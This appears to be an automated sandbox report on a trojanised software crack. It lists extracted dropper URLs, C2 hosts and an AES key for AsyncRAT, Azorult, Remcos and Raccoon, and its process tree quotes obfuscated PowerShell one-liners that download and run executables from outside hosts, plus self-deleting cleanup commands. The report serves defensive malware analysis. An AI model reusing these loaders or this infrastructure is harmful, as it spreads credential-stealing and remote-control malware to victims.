Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    1804s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 17:26

General

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Extracted

Family

remcos

C2

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Contains code to disable Windows Defender 14 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies firewall policy service 2 TTPs 8 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • UAC bypass 3 TTPs
  • Async RAT payload 4 IoCs
  • ModiLoader First Stage 3 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Disables taskbar notifications via registry modification
  • Disables use of System Restore points 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Sets file execution options in registry 2 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 31 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 17 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 20 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Maps connected drives based on registry 3 TTPs 42 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 9 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe
    "C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7574.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
      2⤵
      • Checks whether UAC is enabled
      • Maps connected drives based on registry
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Local\Temp\7574.tmp\key.exe
        key.exe
        3⤵
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Maps connected drives based on registry
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:1008
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t12821.bat" "C:\Users\Admin\AppData\Local\Temp\7574.tmp\key.exe" "
          4⤵
          • Drops file in Drivers directory
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Maps connected drives based on registry
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:212
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
            5⤵
            • Views/modifies file attributes
            PID:2576
          • C:\Windows\SysWOW64\find.exe
            FIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts
            5⤵
              PID:1020
            • C:\Windows\SysWOW64\find.exe
              FIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts
              5⤵
                PID:564
              • C:\Users\Admin\AppData\Local\Temp\afolder\data.dat
                C:\Users\Admin\AppData\Local\Temp\afolder/data.dat
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Maps connected drives based on registry
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:560
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 1
            3⤵
            • Delays execution with timeout.exe
            PID:2812
          • C:\Users\Admin\AppData\Local\Temp\7574.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
            Microsoft.VisualStudio.Package.LanguageService.11.0.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              "wmic" os get Caption /format:list
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3992
          • C:\Windows\SysWOW64\timeout.exe
            TIMEOUT /T 2
            3⤵
            • Delays execution with timeout.exe
            PID:1604
          • C:\Users\Admin\AppData\Local\Temp\7574.tmp\bb.exe
            bb.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2476
            • C:\Users\Admin\AppData\Local\Temp\7574.tmp\bb.exe
              "C:\Users\Admin\AppData\Local\Temp\7574.tmp\bb.exe"
              4⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Checks processor information in registry
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3848
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                5⤵
                • Modifies firewall policy service
                • Checks BIOS information in registry
                • Adds Run key to start application
                • Drops desktop.ini file(s)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks processor information in registry
                • Enumerates system info in registry
                • Modifies Internet Explorer Protected Mode
                • Modifies Internet Explorer Protected Mode Banner
                • Modifies Internet Explorer settings
                • NTFS ADS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1872
                • C:\Users\Admin\AppData\Local\Temp\1yk35mc99y_1.exe
                  /suac
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4688
                  • C:\Users\Admin\AppData\Local\Temp\1yk35mc99y_1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1yk35mc99y_1.exe"
                    7⤵
                    • Modifies firewall policy service
                    • Executes dropped EXE
                    • Checks for any installed AV software in registry
                    • Checks whether UAC is enabled
                    • Checks processor information in registry
                    • Suspicious behavior: MapViewOfSection
                    PID:4068
                    • C:\Windows\SysWOW64\regedit.exe
                      "C:\Windows\SysWOW64\regedit.exe"
                      8⤵
                      • Modifies security service
                      • Adds Run key to start application
                      • Modifies Internet Explorer settings
                      • Runs regedit.exe
                      PID:4776
                • C:\Users\Admin\AppData\Local\Temp\m1e313173.exe
                  "C:\Users\Admin\AppData\Local\Temp\m1e313173.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Maps connected drives based on registry
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:5200
                  • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                    "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:5540
                    • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                      "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:4552
                  • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                    "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:5608
                    • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                      "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:752
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 752 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\302130285904197\\* & exit
                        9⤵
                          PID:5388
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 752
                            10⤵
                            • Kills process with taskkill
                            PID:5404
                    • C:\Users\Admin\AppData\Local\Temp\m1e313173.exe
                      "C:\Users\Admin\AppData\Local\Temp\m1e313173.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:5116
                  • C:\Users\Admin\AppData\Local\Temp\k1o31iq1195.exe
                    "C:\Users\Admin\AppData\Local\Temp\k1o31iq1195.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Maps connected drives based on registry
                    • Suspicious use of SetThreadContext
                    PID:6012
                    • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                      "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:6848
                      • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                        "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:6884
                        • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                          "{path}"
                          9⤵
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:7084
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 7084 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\339007076251744\\* & exit
                            10⤵
                              PID:2136
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 7084
                                11⤵
                                • Kills process with taskkill
                                PID:4728
                        • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                          "{path}"
                          8⤵
                            PID:1708
                        • C:\Users\Admin\AppData\Local\Temp\k1o31iq1195.exe
                          "{path}"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops desktop.ini file(s)
                          PID:6880
                          • C:\Users\Admin\AppData\Local\Temp\VIdTd3Tc9z.exe
                            "C:\Users\Admin\AppData\Local\Temp\VIdTd3Tc9z.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:6972
                            • C:\Users\Admin\AppData\Local\Temp\VIdTd3Tc9z.exe
                              "C:\Users\Admin\AppData\Local\Temp\VIdTd3Tc9z.exe"
                              9⤵
                              • Executes dropped EXE
                              PID:4172
                          • C:\Users\Admin\AppData\Local\Temp\pLeynHJpzs.exe
                            "C:\Users\Admin\AppData\Local\Temp\pLeynHJpzs.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:6768
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              9⤵
                                PID:6692
                            • C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe
                              "C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:6280
                              • C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe
                                "C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe"
                                9⤵
                                • Executes dropped EXE
                                PID:5004
                              • C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe
                                "C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe"
                                9⤵
                                • Executes dropped EXE
                                PID:5104
                              • C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe
                                "C:\Users\Admin\AppData\Local\Temp\YApQeKA3Xe.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:6492
                                • \??\c:\windows\SysWOW64\cmstp.exe
                                  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\wckglyce.inf
                                  10⤵
                                    PID:5060
                              • C:\Users\Admin\AppData\Local\Temp\4VaD9fscp6.exe
                                "C:\Users\Admin\AppData\Local\Temp\4VaD9fscp6.exe"
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:5272
                                • C:\Users\Admin\AppData\Local\Temp\4VaD9fscp6.exe
                                  "C:\Users\Admin\AppData\Local\Temp\4VaD9fscp6.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Windows security modification
                                  PID:5128
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" Get-MpPreference -verbose
                                    10⤵
                                      PID:4696
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\k1o31iq1195.exe"
                                  8⤵
                                    PID:4872
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      9⤵
                                      • Delays execution with timeout.exe
                                      PID:5772
                        • C:\Windows\SysWOW64\timeout.exe
                          TIMEOUT /T 3
                          3⤵
                          • Delays execution with timeout.exe
                          PID:3024
                        • C:\Users\Admin\AppData\Local\Temp\7574.tmp\puttty.exe
                          puttty.exe
                          3⤵
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Maps connected drives based on registry
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1336
                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                            dw20.exe -x -s 1532
                            4⤵
                            • Maps connected drives based on registry
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1548
                        • C:\Windows\SysWOW64\timeout.exe
                          TIMEOUT /T 4
                          3⤵
                          • Delays execution with timeout.exe
                          PID:3980
                        • C:\Users\Admin\AppData\Local\Temp\7574.tmp\ereds.exe
                          ereds.exe
                          3⤵
                          • Executes dropped EXE
                          PID:2684
                          • C:\Users\Admin\AppData\Local\Temp\keygen.exe
                            "C:\Users\Admin\AppData\Local\Temp\keygen.exe"
                            4⤵
                              PID:4244
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"
                                5⤵
                                • Checks whether UAC is enabled
                                • Maps connected drives based on registry
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Modifies registry class
                                PID:4288
                                • C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\Keygen.exe
                                  Keygen.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Maps connected drives based on registry
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4340
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                  6⤵
                                  • Checks whether UAC is enabled
                                  • Maps connected drives based on registry
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:4412
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                    7⤵
                                    • Blocklisted process makes network request
                                    • Maps connected drives based on registry
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4564
                                    • C:\Users\Public\eav.exe
                                      "C:\Users\Public\eav.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4356
                                      • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                                        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                                        9⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: MapViewOfSection
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4644
                                        • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                                          "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                                          10⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4816
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                  6⤵
                                  • Checks whether UAC is enabled
                                  • Maps connected drives based on registry
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:4440
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                    7⤵
                                    • Maps connected drives based on registry
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4572
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout 1
                                  6⤵
                                  • Delays execution with timeout.exe
                                  PID:4464
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC8F.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                  6⤵
                                    PID:4980
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                      7⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4128
                                      • C:\Users\Public\epu.exe
                                        "C:\Users\Public\epu.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        • Maps connected drives based on registry
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetThreadContext
                                        PID:5108
                                        • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                                          "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5552
                                          • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                                            "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
                                            10⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5536
                                            • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                                              "{path}"
                                              11⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              PID:3540
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3540 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\155943301911557\\* & exit
                                                12⤵
                                                  PID:3984
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /pid 3540
                                                    13⤵
                                                    • Kills process with taskkill
                                                    PID:4848
                                            • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                                              "{path}"
                                              10⤵
                                              • Executes dropped EXE
                                              PID:4956
                                            • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                                              "{path}"
                                              10⤵
                                              • Executes dropped EXE
                                              PID:5136
                                          • C:\Users\Public\epu.exe
                                            "{path}"
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops desktop.ini file(s)
                                            PID:5000
                                            • C:\Users\Admin\AppData\Local\Temp\QxPSDVcb8X.exe
                                              "C:\Users\Admin\AppData\Local\Temp\QxPSDVcb8X.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4416
                                              • C:\Users\Admin\AppData\Local\Temp\QxPSDVcb8X.exe
                                                "C:\Users\Admin\AppData\Local\Temp\QxPSDVcb8X.exe"
                                                11⤵
                                                • Executes dropped EXE
                                                PID:4528
                                            • C:\Users\Admin\AppData\Local\Temp\d8FtANW6QA.exe
                                              "C:\Users\Admin\AppData\Local\Temp\d8FtANW6QA.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1832
                                              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                11⤵
                                                  PID:6644
                                              • C:\Users\Admin\AppData\Local\Temp\PLSkebaejl.exe
